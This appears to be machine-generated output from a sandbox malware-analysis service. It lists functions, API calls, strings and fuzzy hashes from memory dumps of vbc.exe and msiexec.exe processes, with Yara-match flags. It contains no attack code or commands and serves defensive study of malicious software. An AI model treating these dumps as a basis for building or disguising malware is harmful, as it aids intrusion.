Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
Instruction ID: 8eebf5763d3f5fbfe0faef7f2a56e820e9104b416245083c7acf16ea107c958d
Opcode Fuzzy Hash: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
Instruction Fuzzy Hash: E52191B2900219ABCB24EF58CD41AEF73BCBB90700F548555FC4AD7141DB70AA5A8BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA22F4

Strings

RTL: Resource at %p, xrefs: 00AA230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
RTL: Re-Waiting, xrefs: 00AA2328

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
Instruction ID: 1317fc116970ccd443843b3140a28835e8de914156106ca3ee5e25088ffbf05f
Opcode Fuzzy Hash: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
Instruction Fuzzy Hash: F9513572A007026BDF15EB38CD91FA673A8EF59760F104229FD49DF281EB61EC4187A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 2308 Parent PID: 1764 msiexec.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	321
Total number of Limit Nodes:	46

Executed Functions

Function 000A9D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 000A9D9D

Strings

.z`, xrefs: 000A9D8D, 000A9D98
wK, xrefs: 000A9D6C, 000A9D78

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wK
API String ID: 823142352-3168009529
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 62242dcb0cb6cb8fdf35feb000ed7ba1a4cfa2e7837d57956a909346ba261c97
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 78F0BDB2200208AFCB48CF88DC95EEB77ADAF8C754F158248BA1D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000A9E00, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,000A49F1,?,?,?,?,000A49F1,FFFFFFFF,?,2M,?,00000000), ref: 000A9E45

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 70e5ea030badbcfc9ed191148f65edb957fd12e1c00fe8351278fcc326b9016a
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 59F0B7B2200209AFCB14DF89DC91EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000A9E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(000A4D10,?,?,000A4D10,00000000,FFFFFFFF), ref: 000A9EA5

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: ad80bea982b162e0ff2c0d492a8af675178a6ed854df20590b9153291bfaf133
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: E8D01776600214ABD710EBD8CC86EE77BACEF49760F154499BA5C9B282C630FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 027100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 027100CF

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 027107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 027107B7

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0270FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FAF3

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0270FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FB73

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0270FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FB5B

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0270FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FBC3

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0270F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270F90E

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0270F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270F9FB

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0270FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FEDB

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0270FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FFBF

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0270FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FC6B

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0270FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FDCB

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0270FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0270FD9A

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00098286, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B

Strings

(, xrefs: 0009828C

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: (
API String ID: 1836367815-3887548279
Opcode ID: 3003fe5868c96de53218c621c9b936f38735ddac68ca54658a4cecf11195dfd8
Instruction ID: 555c38e6c4b57b9c3d25110c6efe5121fc790f6043becedee5c484280c734d2f
Opcode Fuzzy Hash: 3003fe5868c96de53218c621c9b936f38735ddac68ca54658a4cecf11195dfd8
Instruction Fuzzy Hash: 69019B31A402187BEB60A6949C43FFE776CAF42B50F144518FE44BA1C2EAD56A0A47E6

Uniqueness

Uniqueness Score: -1.00%

Function 000AA060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA08D

Strings

.z`, xrefs: 000AA07C, 000AA088

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e323204c58ca745e5d44cd562f8689ea1b9c4a7588e8519be4ab138cc76ae66d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 61E012B1200209ABDB18EF99CC49EA777ACAF88750F018558BA185B282C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 000982B3, Relevance: 3.1, APIs: 2, Instructions: 71
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ffebd6c5cd0b63d229a9f08d4911564446a0e5be8b8f1307e14344092a30e378
Instruction ID: 6840098f417bda584e80f4a9dab381ba8de13ad7066ce047309c414b5fccad66
Opcode Fuzzy Hash: ffebd6c5cd0b63d229a9f08d4911564446a0e5be8b8f1307e14344092a30e378
Instruction Fuzzy Hash: B511C831940224BBDB21A7989C02FEE7368BF42B50F154458FA04BF2C3E7A5AA0587E1

Uniqueness

Uniqueness Score: -1.00%

Function 000982E9, Relevance: 3.1, APIs: 2, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

